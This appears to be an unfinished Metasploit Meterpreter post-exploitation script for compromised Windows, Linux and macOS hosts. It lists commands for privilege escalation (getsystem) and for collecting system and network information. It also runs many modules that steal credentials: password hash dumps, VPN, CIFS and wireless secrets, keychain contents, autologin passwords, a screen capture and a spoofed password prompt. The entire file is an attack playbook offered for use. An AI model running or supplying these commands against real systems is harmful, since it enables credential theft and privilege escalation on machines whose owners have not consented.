# Work in progress
# Need to add logic to test for OS type, then run corresponding modules.

# Windows
getuid
sysinfo
ipconfig
run get_local_subnets
run post/windows/gather/checkvm

use priv
getsystem
run post/windows/escalate/getsystem

hasdump
run get_application_list
run winenum

# Linux
run post/linux/gather/checkvm
run post/linux/gather/ecryptfs_creds
run post/linux/gather/enum_configs
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/enum_xchat
run post/linux/gather/gnome_commander_creds
run post/linux/gather/mount_cifs_creds       
run post/linux/gather/openvpn_credentials
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/hashdump

# OS X
run post/osx/capture/screen
run post/osx/gather/autologin_password
run post/osx/gather/enum_adium
run post/osx/gather/enum_airport
run post/osx/gather/enum_chicken_vnc_profile
run post/osx/gather/enum_colloquy
run post/osx/gather/enum_keychain
run post/osx/gather/enum_osx
run post/osx/gather/password_prompt_spoof
run post/osx/gather/safari_lastsession
run post/osx/gather/hashdump
